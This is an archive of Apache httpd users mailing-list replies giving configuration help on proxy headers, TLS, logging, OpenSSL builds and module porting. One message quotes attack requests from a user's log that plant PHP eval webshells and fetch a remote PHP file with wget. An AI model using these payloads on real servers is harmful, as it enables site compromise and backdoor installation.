Re: [users@httpd] AWS Network Loadbalancer’s ProxyProtocol V2 and HTTPD mod_remoteip

2019-10-17 Thread William A Rowe Jr
Looks like it's not enabled on your listener. The global setting is not
correctly inherited (and can lead to crashes because the merging is not
handled correctly either.) I'd explicitly enable it in the first instance
of each <VirtualHost> you are configuring.

The fix is non-trivial, feel free to file a bug that "Globally set
RemoteIPProxyProtocol is not inherited by virtual hosts".


On Thu, Oct 17, 2019 at 10:50 AM David Tkacik wrote:

> This is the only thing relevant to this:
>
> [Thu Oct 17 15:49:26.886038 2019] [core:debug] [pid 30279]
> protocol.c(1335): [client 172.31.38.27:59548] AH00566: request failed:
> malformed request line
>
> Thanks !
>
> On 17 Oct 2019, at 15:52, William A Rowe Jr  wrote:
>
> On Thu, Oct 17, 2019 at 9:04 AM David Tkacik <
> dtka...@healthcoachinstitute.com> wrote:
>
>>
>> But when I try to connect I’m getting 400 Bad Request
>>
>
> Change your Apache LogLevel to 'debug' and repeat the attempt, examine the
> error log and feel free to quote it here for further guidance.
>
>
>


Re: [users@httpd] Is it possible to have in Apache 2.4 VirtualHosts, each with its own SSLProtocol ?

2019-10-17 Thread William A Rowe Jr
On Thu, Oct 17, 2019 at 2:06 AM Marian Ion wrote:

>
> Yes, that's why I set "SSLStrictSNIVHostCheck On" -> according to the
> documentation "If set to on in the default name-based virtual host,
> clients that are SNI unaware will not be allowed to access any virtual
> host".
> I set it in the default virtual host and in my "second.server" (that is
> supposed to be TLS 1.3 only) but it didn't change the behaviour (i.e.
> second.server still accepts TLS 1.2 requests...)
>

TLS revision describes the handshake protocol. Either the listener accepts
TLS 1.2 handshakes, or it does not, it won't look at SNI until the handshake
is in flight with the respective TLS handshake.

This points out the possibility of multi-homing the box with one IP which
accepts TLS 1.2+ and a different IP listening with TLS 1.3 only.


Re: [users@httpd] AWS Network Loadbalancer’s ProxyProtocol V2 and HTTPD mod_remoteip

2019-10-17 Thread William A Rowe Jr
On Thu, Oct 17, 2019 at 9:04 AM David Tkacik <
dtka...@healthcoachinstitute.com> wrote:

>
> But when I try to connect I’m getting 400 Bad Request
>

Change your Apache LogLevel to 'debug' and repeat the attempt, examine the
error log and feel free to quote it here for further guidance.


Re: [users@httpd] Can't get X-Forwarded-For to be passed through to app with apache reverse proxy

2019-09-24 Thread William A Rowe Jr
It's spelled out right in the docs, that header is consumed as decoded by
httpd, and the effective remote IP address is what it decoded. If you want
it seen by Tomcat, don't do that.

https://httpd.apache.org/docs/2.4/mod/mod_remoteip.html#processing

On Mon, Sep 23, 2019, 12:45 John Pyeatt wrote:

> I have tried everything and I can't get Apache (2.4.39) to pass the
> X-Forwarded-For header to my tomcat (8.5) instance.
>
> I have apache listening on port 8081 and bound to the public IP address as
> a reverse proxy to a backend tomcat instance which is also bound to 8081
> but on 127.0.0.1.
> My apache instance has the following modules loaded:
>
>  proxy_module (shared)
>  proxy_connect_module (shared)
>  proxy_ajp_module (shared)
>  proxy_http_module (shared)
>  proxy_wstunnel_module (shared)
>  remoteip_module (shared)
>
> Here is my virtualhost stanza
> 
> ProxyPreserveHost On
> ProxyPass /MYAPP/admin http://127.0.0.1:8081/MYAPP/admin
> RemoteIPHeader X-Forwarded-For
> RemoteIPInternalProxy 127.0.0.0/8
> 
> ProxyAddHeaders On
> ProxyPassReverse /MYAPP/admin
> # Only allow ?cmd=spkr
> RewriteEngine On
> RewriteCond %{QUERY_STRING} !cmd=spkr
> RewriteRule .* - [F]
> 
> 
>
> According to the doc
> https://httpd.apache.org/docs/2.4/mod/mod_proxy.html#proxyaddheaders
> ProxyAddHeaders On should do the trick.
>
> I've done a packet capture to see if the X-Forwarded-For header is being
> generated by Apache but dropped on the floor in Tomcat and I'm not seeing
> X-Forwarded-For header coming from Apache.
>
> The slightly weird thing is that my tomcat app is also listening on port
> 5678 using AJP and that works if I change to ProxyPass /MYAPP/admin ajp://
> 127.0.0.1:5678/MYAPP/admin. Calls to HttpRequest.getRemoteAddr() in my
> tomcat app correctly return the IP address of my client. I find it very
> hard to believe that proxy_ajp_module works fine and proxy_http_module
> somehow has a bug in it. So I must be missing some magic apache
> configuration setting.
>
>
> --
> John Pyeatt
> Software Developer
> (608) 661-1184 | john.pye...@singlewire.com
>
>


Re: [users@httpd] Apache 2.4.6 - ErrorLog

2019-09-13 Thread William A Rowe Jr
On Fri, Sep 13, 2019 at 3:46 PM Jim Albert wrote:

> In use of CentOS7 servers and the included apache, I'm moving to
> Apache/2.4.6
>
> It appears something related to ErrorLog has changed.
> I'm using what I have always used:
> ErrorLog "logs/error_log"
>
> and I do see messages going to logs/error_log such as start/stop and
> certain types of errors such as access denied, but something simple like
> a file not found error is not getting logged outside of certain scripts
> not being found associated with ScriptAlias definitions.
>
> But just a request to https://'my_web_server'/no_such_file.html does not
> get logged as not found as it used to in earlier apache. Nothing related
> to this file not being found gets printed to logs/error_log.
>
> I've checked docs on ErrorLog along with httpd.conf and .htaccess files,
> but nothing is jumping out at me as relevant to this behavior.
>
> Note LogLevel setting:
> LogLevel warn


Right, if the file isn't found the client asked for a non-existent resource.
Nothing to be "warned" of.

Try LogLevel info (or even debug) if you want to see higher resolution
details about errors caused by the client, as opposed to errors in your
configuration that the operator needs to act on.


Re: [users@httpd] Crash of httpd in Endurance

2019-08-30 Thread William A Rowe Jr
Check the respective versions of apr and apr-util, perhaps that is the
underlying change, since this is arch-specific?

You can check any existing MaxMemFree
https://httpd.apache.org/docs/2.4/mod/mpm_common.html#maxmemfree
directive and perhaps toggle it down to 1MB (value 1024) persisting between
requests?



On Tue, Aug 27, 2019 at 10:20 PM kishore wrote:

> Hi,
> Upon further investigation we found there is a memory leak which is
> causing increase in usage of swap memory. Once the swap memory runs out of
> space one of the child process generates a core file.
> This behavior is observed only on Solaris with 2.4.34 and above (tested
> 2.4.41 as well). httpd 2.4.29 doesn't have this issue. Are there any known
> memory leaks on Solaris Sparc 11.4 with latest Apache httpd versions.
>
> Thank you,
> Kishore
>
>
> On Fri, Aug 23, 2019, 23:27 kishore wrote:
>
>> Hi Dennis,
>> Below is the output from pstack

Re: [users@httpd] Compiling Apache with Non-System OpenSSL

2019-07-31 Thread William A Rowe Jr
On Wed, Jul 31, 2019 at 7:27 PM Nigel B. Peck wrote:

>
> Setting up LD_LIBRARY_PATH in the envvars seems the best way to go in my
> case then, with the need to avoid a system-wide install. Good to have
> understood the options better.
>

w.r.t. Apache httpd, there is an installed script called apachectl. This is
the script you want to modify for additional LD_LIBRARY_PATH's and other
runtime tweaks.


> Still don’t get why pcre is found in the location provided but not
> openssl.
>

Every package does things their own way, but either a pkgconfig description
exists to describe the compile and link time option flags or there might be
{package}-config script to retrieve that info. The apr and httpd projects
use 12 different ways to Sunday to get at this info and it varies from
dependency to dependency. And the details in the pkgconfig flags vary
considerably from package to package and their release to release (and also
tweaked by distribution to add extra surprises.)

So it's probably that pkgconfig for pcre sets up the -R path, while openssl
you are building does not, or httpd failed to interrogate and consume that
pkgconfig input in the openssl case, but did the right thing for pcre.


Re: [users@httpd] Issue with FastCGI module in Apache 2.4

2019-07-19 Thread William A Rowe Jr
mod_fastcgi is long abandoned and was not a part of the httpd project. A
derivative work mod_fcgid is maintained (lethargically) by the project as a
separate download ... https://httpd.apache.org/mod_fcgid/ and a new *core*
module was introduced, mod_proxy_fcgi that is part of the standard
distribution and is more helpful to some users, since it follows the proxy
semantics. See https://httpd.apache.org/docs/2.4/mod/mod_proxy_fcgi.html



On Fri, Jul 19, 2019, 03:09 Raani Palle, Nunda wrote:

> Team,
>
> I am upgrading apache version from 2.0 – 32 bit to 2.4 – 64 bit on Linux.
>
>
>
> I am not able to convert the httpd.conf file to newer version.
>
> Please help.
>
> Especially I'm finding difficulty in migrating the variable ‘FastCgiServer’
>
>
>
> Httpd.conf in 2.0 version
>
> AddHandler fastcgi-script .fcgi
>
> # Launch the FastCGI processes
> FastCgiIpcDir /tmp
> FastCgiServer /datlib/advantage/pc/envs/fo_b2_a/manager/bin/pcwww_fastcgi.pl -idle-timeout 300 -processes 3 -initial-env LD_LIBRARY_PATH
>
> DocumentRoot /datlib/advantage/pc/envs/fo_b2_a/manager/../pc/catalyst/htdocs/
> ScriptAlias /fo_b2_a /datlib/advantage/pc/envs/fo_b2_a/manager/bin/pcwww_fastcgi.pl/
>
> Thanks
>
> Nunda.
>
>


Re: [users@httpd] Apache HTTP Server Prior to 2.4.12 Multiple Vulnerabilities

2019-06-18 Thread William A Rowe Jr
On Tue, Jun 18, 2019 at 6:41 AM Richard wrote:

>
> > Date: Tuesday, June 18, 2019 05:38:50 +
> > From: Satish Chhatpar 02 
> >
> > How to patch Apache 2.4.6 to latest release on RHEL 7.4?
> >
>
> RedHat backports patches to the base version, keeping the version
> number stable within an OS release. I.e., RH-7 will maintain the
> 2.4.6 httpd version number. You need to look at the number after that
> (currently 2.4.6-89) to see the incremental change numbering. You can
> look up the CVEs against RH's change log and/or update announcements
> for a package to see that an issue has been addressed. From what I
> have seen, RH tends to have updated httpd packages out very quickly
> following a vulnerability announcement.
>
> By the way, RH-7 is currently at .6, which came out late last year. A
> .4 system is missing about 18 months of updates.
>

Alternately, look at the RHSCL repos for httpd24, which offers a far more
modern version of httpd, of other server and proxy software, and commonly
used web content authoring languages;

https://access.redhat.com/documentation/en-us/red_hat_software_collections/3/html/3.3_release_notes/sect-RHSCL-Features#tabl-RHSCL-Components


Re: [users@httpd] Can't connect to server on 443 ... no log information being generated

2019-06-04 Thread William A Rowe Jr
On Mon, Jun 3, 2019 at 11:08 PM Geoff Russell wrote:

> Hi Douglas,
>
> Thanks for your help.   I've spent about 6 hours on this problem and it
> has just vanished ...
>
> I tried elinks as a substitute for telnet ... telnet does succeed in the
> socket handshake, so is useful for a quick test of that part of the
> connection.
>

Just for future reference, openssl s_client is the usual way to test the
connection stack to the server, which gives you the options to force
specific versions of tls, specific ciphers, etc.


Re: [users@httpd] Receive openssl library version mismatch when enabling mod_ldap ??!!

2019-05-06 Thread William A Rowe Jr
You need to build OpenLDAP against the OpenSSL in use (this is also true of
curl for mod_md.) Every bit including APR-util are all going to need to
agree on the flavor of OpenSSL in use.



On Fri, May 3, 2019, 14:12 ken edward wrote:

> Hello,
>
> I successfully built a FIPS openssl based mod_ssl for Apache 2.4.39.
> Everything works great via SSL when I boot Apache, EXCEPT when I then
> turn on mod_ldap/mod_authnz_ldap, THEN I get the below openssl library
> version mismatch. The SSL will still work, but it display the below
> warning.
>
> I tried to rebuild apr-util with openssl +ldap and integrate with the
> apache build but same issues... any ideas???
>
>
> LoadModule authnz_ldap_module modules/mod_authnz_ldap.so
> LoadModule ldap_module modules/mod_ldap.so
>
> [Fri May 03 14:59:56.611785 2019] [ssl:warn] [pid 5119] AH01882: Init: this version of mod_ssl was compiled against a newer library (OpenSSL 1.0.2r  26 Feb 2019, version currently loaded is OpenSSL 1.0.0-fips 29 Mar 2010) - may result in undefined or erroneous behavior
> [Fri May 03 14:59:56.661788 2019] [ssl:notice] [pid 5119] AH01884: Operating in SSL FIPS mode
> [Fri May 03 14:59:56.690429 2019] [ssl:warn] [pid 5120] AH01882: Init: this version of mod_ssl was compiled against a newer library (OpenSSL 1.0.2r  26 Feb 2019, version currently loaded is OpenSSL 1.0.0-fips 29 Mar 2010) - may result in undefined or erroneous behavior
> [Fri May 03 14:59:56.739818 2019] [ssl:notice] [pid 5120] AH01884: Operating in SSL FIPS mode
> [Fri May 03 14:59:56.744802 2019] [mpm_prefork:notice] [pid 5120] AH00163: Apache/2.4.39 (Unix) OpenSSL/1.0.0-fips configured -- resuming normal operations
>
>
> BUILT APR-UTIL:
> ./configure -prefix=/u01/tomcat/scm2/apr-util-1.6.1
> --with-apr=/u01/tomcat/scm2/apr-1.6.5 --with-ldap --with-crypto
> --with-openssl=/u01/tomcat/scm2/openssl-1.0.2r
> LDFLAGS=-L/u01/tomcat/scm2/openssl-fips-2.0.16/lib
> -L/u01/tomcat/scm2/openssl-1.0.2r/lib
>
> BUILT httpd apache 2.4.39
> ./configure --prefix=/u01/tomcat/scm2/apache2.4.39kerb2
> --with-ssl=/u01/tomcat/scm2/openssl-1.0.2r --with-mpm=prefork
> --with-ldap --with-apr=/u01/tomcat/scm2/apr-1.6.5
> --with-apr-util=/u01/tomcat/scm2/apr-util-1.6.1 --enable-ssl
> --enable-dav --enable-dav-fs --enable-dav-lock --enable-authnz-ldap
> --enable-ldap -enable-headers CPPFLAGS=-DHAVE_FIPS
> LDFLAGS=-L/u01/tomcat/scm2/openssl-fips-2.0.16/lib
> -L/u01/tomcat/scm2/openssl-1.0.2r/lib
>
>


Re: [users@httpd] Ssl certificate ignored in virtual host

2019-04-18 Thread William A Rowe Jr
On Wed, Apr 17, 2019 at 4:08 PM Rose, John B wrote:

> Why would ssl.conf certificate settings override the certificate settings
> in a specific virtual host config file?
>

The concept is inheritance. Picture all the #include'ed .conf files
flattened at the global scope, unless you actually do an include within a
specific <VirtualHost>.

Basically, what you set outside of all the specific <VirtualHost> blocks
applies globally to all hosts, unless you override them. There are quirky
cases like rewrite and some of ssl which don't auto-inherit the globals,
but for the most part, what gets set outside of <VirtualHost> applies to all
situations that aren't explicitly overridden.


Re: [users@httpd] Unexpected result of requesting client certificate when requesting locations with different SSLVerifyClient settings

2019-04-12 Thread William A Rowe Jr
On Wed, Apr 10, 2019 at 7:30 PM Du Hao wrote:

> Is Apache HTTP Server going to drop TLSv1.2 support in near future? If
> not, it is a bug that affects user who voluntarily choose to not use
> TLSv1.3.
>

Because 2.4 dates all the way back to the now-unsupported 0.9.8 lifecycle,
it seems unlikely that any httpd 2.4.x would entirely drop this or later
support, but note these EOL dates from the OpenSSL project as published at
https://www.openssl.org/policies/releasestrat.html

The next version of OpenSSL will be 3.0.0.
Version 1.1.1 will be supported until 2023-09-11 (LTS).
Version 1.1.0 will be supported until 2019-09-11.
Version 1.0.2 will be supported until 2019-12-31 (LTS).
Version 1.0.1 is no longer supported.
Version 1.0.0 is no longer supported.
Version 0.9.8 is no longer supported.

So it's entirely reasonable that any 2.next or 3.0 release of Apache HTTP
Server by midyear could elect to drop all support for any 1.0.1 or earlier
flavor, and if not released until next year - might even drop support
for all flavors earlier than 1.1.1. Not certain what course the project
will choose to follow, since these antique flavors are still found across
many flavors of commonly provisioned OS's.

Best practices and PCI standards already discourage and will eventually
forbid the use of context-specific renegotiation, and will eventually drop
TLS 1.2 itself. Some useful information on such guidelines is summarized
and maintained at https://en.wikipedia.org/wiki/Transport_Layer_Security


Re: [users@httpd] Unexpected result of requesting client certificate when requesting locations with different SSLVerifyClient settings

2019-04-10 Thread William A Rowe Jr
On Wed, Apr 10, 2019 at 10:48 AM Du Hao wrote:

>
> I suspect there is a bug involved in the SSL client verification type
> changing and the re-negotiation flow. While I admit it may be a corner case
> but the original use case is very crucial to my current user base. I
> checked the Bug database and there is a similar bug except that is related
> to TLSv1.3. For browser compatibility, I am currently disabling TLSv1.3,
> although I am testing with Apache 2.4.38 and OpenSSL 1.1.1b.
> I would love to hear any suggestions on an alternative configuration to
> support my scenario, and thank you very much in advance.
>

Hello Du Hao,

you probably want to abandon your current approach. With TLSv1.3, which
will come to dominate and eliminate earlier TLS protocols, there is no
mechanism for renegotiation. The entire site (defined using SNI, server
name indication) will need to share a common handshake, the idea of only
locking down https://site.example.co/protected/ gets eliminated with this
protocol, and with many only TLS's which actively disable renegotiation due
to the underlying potential security holes over time.


Re: [users@httpd] Re: CVE-2019-0211/0215/0217

2019-04-07 Thread William A Rowe Jr
In general, problems which stretch back to the initial 2.4.1 or commonly
deployed 2.4.3 might also affect 2.2.x or 2.0.x. As users have had almost a
decade to adjust and these versions are EOL, the project seems unlikely to
care, and notices are everywhere that the old flavors are no longer
evaluated for the impact of any defects, security or otherwise. Vendors who
support older flavors are on their own to make such evaluations themselves.

And in general, when a later, specific flavor of 2.4.x (e.g. 2.4.17) is
cited as the first version impacted, that version is expected to be the one
where a defect was introduced.

There is the edge case that a problem could exist, then be fixed or masked
sometime before 2.4.1, and later be reintroduced during 2.4.x, but the
rules above should generally apply.

On Sun, Apr 7, 2019, 02:38 @lbutlr wrote:

> On 6 Apr 2019, at 08:59, Sunhux G wrote:
> > Are above CVEs affecting Apache httpd (ie web servers) 2.4.x  only
> > & other lower versions (eg: our Solaris 10's  Apache/2.0.63) are not
> > affected?
>
> The CVE lists, explicitly, what versions are affected.
>
> "The flaw was discovered by Charles Fol and impacts all Apache HTTP Server
> releases from 2.4.17 to 2.4.38. The issue has been addressed with the
> release of Apache httpd 2.4.39"
>
> Also, as you should be aware, Apache 2.0 and Apache 2.2 are both
> End-of-life and not supported any longer.
>
>
> --
> Love is like oxygen / You get too much / you get too high / Not enough
> and you're gonna die
>
>
>


Re: [users@httpd] Strange responses

2019-04-07 Thread William A Rowe Jr
The requests processed asked to GET and POST to / in HTTP/1.1 protocol.

Why do you suppose your server should reject a request for the content '/'?
Seems like a very strange concern.

Depending on the handler charged with processing '/', the remaining '?'
query args are interpreted, or generally ignored.


On Fri, Apr 5, 2019, 23:15 kohmoto wrote:

> Hi,
>
> I operate my site with httpd 2.4.39 with ssl option.
>
> Yesterday, strange responses were observed.
>
> My site received the following abuse requests.  Except the following
> requests, the httpd returns 404 error to obvious abuse requests. However,
> as to the following two queries, the httpd seemed to return a message
> when it receives 'GET /' with 200 status.  I expect the httpd should
> return 404 error.
>
> Case 1:
> GET
> /?1=%40ini_set%28%22display_errors%22%2C%220%22%29%3B%40set_time_limit%280%29%3B%40set_magic_quotes_runtime%280%29%3Becho%20%27-%3E%7C%27%3Bfile_put_contents%28%24_SERVER%5B%27DOCUMENT_ROOT%27%5D.%27/webconfig.txt.php%27%2Cbase64_decode%28%27PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8%2B%27%29%29%3Becho%20%27%7C%3C-%27%3B
>
> HTTP/1.1
>
> Case 2:
> POST
>
> /?q=user%2Fpassword%5B%23post_render%5D%5B%5D=passthru%5B%23type%5D=markup%5B%23markup%5D=echo+%27Vuln%21%21+patch+it+Now%21%27+%3E+vuln.htm%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+sites%2Fdefault%2Ffiles%2Fvuln.php%3B+echo+%27Vuln%21%21%3C%3Fphp+%40eval%28%24_POST%5B%27pass%27%5D%29+%3F%3E%27%3E+vuln.php%3B+cd+sites%2Fdefault%2Ffiles%2F%3B+echo+%27AddType+application%2Fx-httpd-php+.jpg%27+%3E+.htaccess%3B+wget+%27http%3A%2F%
> 2F40k.waszmann.de%2FDeutsch%2Fimages%2Fup.php%27
> HTTP/1.1
>
> It would be very appreciated if someone could advise me.
>
> Thank you.
>
> Yours truly,
>
> Kazuhiko Kohmoto
>
>
>
>


Re: [users@httpd] Apache httpd 2.4.39 GA for Windows

2019-04-02 Thread William A Rowe Jr
On Tue, Apr 2, 2019 at 2:35 AM Steffen wrote:

> The ASF HTTPD project did not mention security vulnerabilities fixed in
> the initial changelog 2.4.39.


To be 100% accurate, the ASF HTTP Server project had not announced the
release of 2.4.39. It had concluded a vote, but only the RM's announcement
triggers the release. There is a delay for the RM to stage the artifacts so
they can be downloaded by anyone from our entire array of mirror sites. And
in that time, the RM could even pull the release owing to a serious packaging
glitch, if they should need to (this happened not so long ago at httpd.)

You jumped the gun by pre-announcing your package as a "release", ahead
of the RM's announce and ahead of downloads from the ASF, which is poor
form to say the least.

Security issues are embargoed until that announcement is broadcast by
the RM to the entire public at once. The project will not mention security
vulnerabilities fixed until that moment.

This isn't to say you shouldn't assemble your release of version x.y.z based
on the vote candidate; in fact any change to that source package will always
trigger version x.y.z+1, so there is no risk that your build varies from
the final announced package. Be ahead of the game preparing your binary
package, but defer any publicity until after the actual announcement.


Re: [users@httpd] WAMP64 Apache2.4 & PHP 5.2?

2019-01-29 Thread William A Rowe Jr
On Tue, Jan 29, 2019, 14:16 Jerry Malcolm wrote:

> On 1/29/2019 12:31 PM, William A Rowe Jr wrote:
>
> On Tue, Jan 29, 2019 at 12:27 PM Jerry Malcolm wrote:
>
>> I'm running a very recent version of WAMP x64.  I inherited an 'ancient'
>> php app that requires php 5.2 and no higher.   I went through the
>> process of adding php 5.2 to WAMP, and I copied php5apache2_4.dll from
>> php 5.6 folder and did the other things in the instructions to add a php
>> version to WAMP.  But now apache won't start and says it can't find the
>> php5apache2_4.dll file.
>>
>> I've seen several posts about this error message, but they all reference
>> different versions.  And I know the dll is good since it works fine on
>> php 5.6.
>>
>> My question is... is Win64 Apache 2.4 and php 5.2 a valid combination?
>> I don't want to continue beating my head against the wall only to find
>> out that this combination is simply not possible.  If it is valid, then
>> I'll continue debug.  If not, I'm in a mess... but it's not a
>> configuration issue...
>>
>
> You can never combine 32 bit loadable modules in a 64 bit Apache
> httpd process. That means x64 is going to require mod_php 64 bit
> built against the 64 bit httpd 2.4 and 64 bit php 5.2, in your example.
>
> The sysinternals tool depends.exe for 64 bit can quickly show you
> missing dependencies, and whether the loaded exe/dll/so file was
> 64 or 32 bits.
>
> Thanks for the quick response, William.
>
> It appears that the answer to my question is that there is NOT an x64 php
> 5.2.  It is only 32 bit.  (64-bit started with 5.3). I found a link on
> ApacheLounge to a personally-built x64 php 5.2.  But the link is dead.
> Does anybody else have a private-built x64 php 5.2?
> Alternative, has anybody had any experience with running both a 32-bit
> Apache and 64-bit WAMP on the same box? Or is that even possible?  I know
> I'd need to have one on different ports, but I could redirect certain urls
> to the other port.  Is this a horrible idea?
>

It's actually not a horrible idea. The PHP project strongly encourages
admins to host their content using the PHP fcgi sapi. Route to a pool of
5.2 hosts (32 bit, this is out of process) using either mod_proxy_fcgi or
mod_fcgid. Do the same to a pool of 5.6 hosts for modern apps. These are
all distinct processes and httpd is just moving the traffic, not generating
the dynamic content.


Re: [users@httpd] WAMP64 Apache2.4 & PHP 5.2?

2019-01-29 Thread William A Rowe Jr
On Tue, Jan 29, 2019 at 12:27 PM Jerry Malcolm wrote:

> I'm running a very recent version of WAMP x64.  I inherited an 'ancient'
> php app that requires php 5.2 and no higher.   I went through the
> process of adding php 5.2 to WAMP, and I copied php5apache2_4.dll from
> php 5.6 folder and did the other things in the instructions to add a php
> version to WAMP.  But now apache won't start and says it can't find the
> php5apache2_4.dll file.
>
> I've seen several posts about this error message, but they all reference
> different versions.  And I know the dll is good since it works fine on
> php 5.6.
>
> My question is... is Win64 Apache 2.4 and php 5.2 a valid combination?
> I don't want to continue beating my head against the wall only to find
> out that this combination is simply not possible.  If it is valid, then
> I'll continue debug.  If not, I'm in a mess... but it's not a
> configuration issue...
>

You can never combine 32 bit loadable modules in a 64 bit Apache
httpd process. That means x64 is going to require mod_php 64 bit
built against the 64 bit httpd 2.4 and 64 bit php 5.2, in your example.

The sysinternals tool depends.exe for 64 bit can quickly show you
missing dependencies, and whether the loaded exe/dll/so file was
64 or 32 bits.


Re: [users@httpd] Urgent: Need to compress only above 1MB files in Apache webserver

2019-01-10 Thread William A Rowe Jr
Compression on-the-fly is generally unwise. Incrementally better
compression comes at an escalating server cpu penalty. There might be some
way to trigger mod_deflate using mod_lua or mod_rewrite if you were
adventurous, but see this page for info about expr tests for filesize you
can use to toggle the no-brotli and no-gzip flags if you want to try
something straightforward; http://httpd.apache.org/docs/2.4/expr.html

For static content, the right solution is to use mod_negotiation to
transparently serve either brotli or gzip files on the fly based on the end
user's Accept-Encoding request header. It would be nonsense to compress all
such 1mb content on the fly, so instead you provision all three files
alongside one another. E.g. index.html.nc, index.html.gz and index.html.br
reside in the same directory, and the request comes in for index.html
triggering a search for the best match. Your provisioning scripts decide to
create (or update stale) .gz and .br copies of the content to serve
compressed. This wastes zero cpu resource serving the responses, and where
there are no .gz or .br compressed files, the single cleartext flavor will
be served.

This also means there is no compression of dynamic content, however, unless
it is served to the httpd gateway already compressed. Since there is no
file to fingerprint to decide if it is 1MB or smaller, dynamic content
can't be toggled as you've asked in your top post through a 'filesize'
mechanism. Given a response from the backend that has a Content-Length, it
could be finagled, but otherwise requires buffering all 1MB first to decide
if a Transfer-Encoding: chunked backend response is going to add up to 1MB
or not.


On Thu, Jan 10, 2019 at 4:00 PM Srikanth Pippari 
wrote:

> Hello,
>
> Do we have any option to compress only above 1MB size files in Apache 2.4?
>
> Thanks & Regards
>
> --
>
> Srikanth Pippari  | V3OPS team.
>
> Email ID : spipp...@vitechinc.com
>

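An added configuration example for this edit, not from the thread, putting the reply's two recommendations together: pre-compressed static variants chosen by mod_negotiation, and an expr-based opt-out of on-the-fly mod_deflate below a size threshold. The directory, the .nc suffix convention from the reply and the 1 MiB threshold are assumptions.

```apache
# Added example; paths, the .nc suffix and the threshold are assumptions.

# Static content: ship index.html.nc, index.html.gz and index.html.br side by
# side. "index.html" itself must NOT exist, or MultiViews never runs.
<Directory "/srv/www/static">
    Options +MultiViews
    # .nc is not a registered extension; allow variants with unknown suffixes.
    MultiviewsMatch Any
    AddType     text/html .html
    AddEncoding gzip      .gz
    AddEncoding br        .br
    # Among variants the client can decode, mod_negotiation picks the smallest,
    # normally the .br file; a client sending no Accept-Encoding gets the .nc
    # file. The negotiated response carries "Vary: Accept-Encoding" itself.
</Directory>

# On-the-fly compression for whatever is not pre-compressed. mod_deflate skips
# responses that already carry a Content-Encoding, so the variants above are
# never compressed twice.
AddOutputFilterByType DEFLATE text/html text/plain text/css application/javascript

# Opt small files out. filesize() looks at the mapped file, so this only works
# for responses that have a file behind them; dynamic output without a
# Content-Length cannot be sized before it is sent, as the reply explains.
<Directory "/srv/www">
    SetEnvIfExpr "filesize(%{REQUEST_FILENAME}) < 1048576" no-gzip no-brotli
</Directory>
```

Pre-compressing at provisioning time also sidesteps the compression-oracle concern (BREACH) that applies to compressing dynamic pages which mix secrets with attacker-chosen input; static files have no such mix.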

Re: [users@httpd] URGENT: Apache HTTP Migration from 1.3 to 2.4 UNIX Solaris

2019-01-08 Thread William A Rowe Jr
On Tue, Jan 8, 2019 at 10:48 AM  wrote:

>
> I have migrated a user module mod_example from 1.3 to 2.4. But when I try
> to start the apache it is giving a segmentation fault and creating a core.
>
> Following is the stacktrace while debug:
> t@1 (l@1) signal SEGV (no mapping at the fault address) in strlen at
> 0xfefcceb8
> 0xfefcceb8: strlen+0x0018:  ldub [%o2], %o1
> Current function is apr_pstrdup
>77   len = strlen(s) + 1;
> (dbx) where
> current thread: t@1
>   [1] strlen(0x1, 0xed568, 0x1, 0xed558, 0x1, 0x0), at 0xfefcceb8
> =>[2] apr_pstrdup(a = 0xb8190, s = 0x1 ""), line
> 77 in "apr_strings.c"
>   [3] ap_add_module_commands(m = 0xfebc80d8, p = ),
> line 546 in "config.c"
>   [4] ap_add_module(m = 0xfebc80d8, p = 0xb8190, sym_name =  unavailable>), at 0x5db30
>   [5] ap_add_loaded_module(mod = 0xfebc80d8, p = 0xb8190, short_name =
> 0xed510 "example_module"), line 713 in "config.c"
>   [6] load_module(cmd = 0xffbfec90, dummy = , modname =
> 0xed510 "example_module", filename = ), line 302 in
> "mod_so.c"
>
> This is happening while loading a user module that I created:
> LoadModule example_module modules/mod_example.so
>
> Please provide your valuable insight into it so that I can go forward.
>

The info above is a bit limited in diagnosing the specifics of source code
you didn't share, and we aren't that great at divining the invisible, so two
thoughts for you; first build an httpd/apr/your module with CFLAGS -g -O0.
Sometimes you can only reproduce a crash with an optimized build, but
the -g flag always remains useful in this regard (and objcopy can strip
those symbols for general distribution.) I'm guessing the above was built
with '-g' but with some '-O', optimizing out some of the args that might
have been helpful.

Since we can't see above which command in your command_rec array
caused this segfault, we can see you had an invalid string element.

Line 546 of config.c tripped over your input. config.c:546 was trying to;
dir = apr_pstrdup(tpool, cmd->name);

This suggests you added a command to the list without an actual char*
string name value.

Compare your command_rec list with the templates of the various
AP_INIT_* macros to ensure you provided valid initializers... only
static const array values. Ensure you NULL terminate that list.


Re: [users@httpd] Graceful shutdown of apache

2018-12-14 Thread William A Rowe Jr
On Mon, Dec 10, 2018 at 11:11 AM Hemant Chaudhary <
hemantdude.chaudh...@gmail.com> wrote:

> Hi,
>
> I have updated apache-2.4.29 to apache-2.4.37 but still I am not able to
> graceful shutdown in debug mode.
>
> Can you please tell me how should achieve it. ? or let me know the
> function which I should call for proper graceful shutdown.
>

Each MPM (event, worker, process) has its own signaling architecture
between parent and child processes.

The parent process signaling is documented here;
https://httpd.apache.org/docs/2.4/stopping.html

You will need to review the behavior of the child signal handler specific
to the MPM you want to control.

Quoting the doc above; "You will notice many httpd executables running on
your system, but you should not send signals to any of them except the
parent, whose pid is in the PidFile. That is to say you shouldn't ever need
to send signals to any process except the parent. There are four signals
that you can send the parent: TERM, USR1, HUP, and WINCH, which will be
described in a moment."

So what you seek to do is effectively undocumented/unsupported. Debug mode
is not a supported operating mode, as I mentioned earlier.


Re: [users@httpd] Configuring redirects from http to https

2018-12-03 Thread William A Rowe Jr
On Fri, Nov 30, 2018 at 1:40 PM Jack M. Nilles  wrote:

> # http redirect
>>> 
>>>
>>> 
>>>
>> Note you have an error there, the incoming request will be matched to
only one list of matching VirtualHosts, host1.com alone on the first,
and host2 alone on the second list. You surely meant these to share
the same name-based virtual host lists?
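The poster's configuration did not survive archiving, so this is an added example for this edit, not their file: the :80 and :443 name-based virtual hosts carry the same ServerName/ServerAlias set, which is the point of the reply. Hostnames and certificate paths are placeholders.

```apache
# Added example; hostnames and paths are placeholders.
<VirtualHost *:80>
    ServerName  host1.example.com
    ServerAlias host2.example.com www.host1.example.com www.host2.example.com

    RewriteEngine on
    # Only redirect to a name this vhost actually serves. Building the Location
    # from an unchecked Host header would let a client steer the redirect to
    # an arbitrary host whenever this vhost is also the default for *:80.
    RewriteCond %{HTTP_HOST} "^((www\.)?host[12]\.example\.com)(:[0-9]+)?$" [NC]
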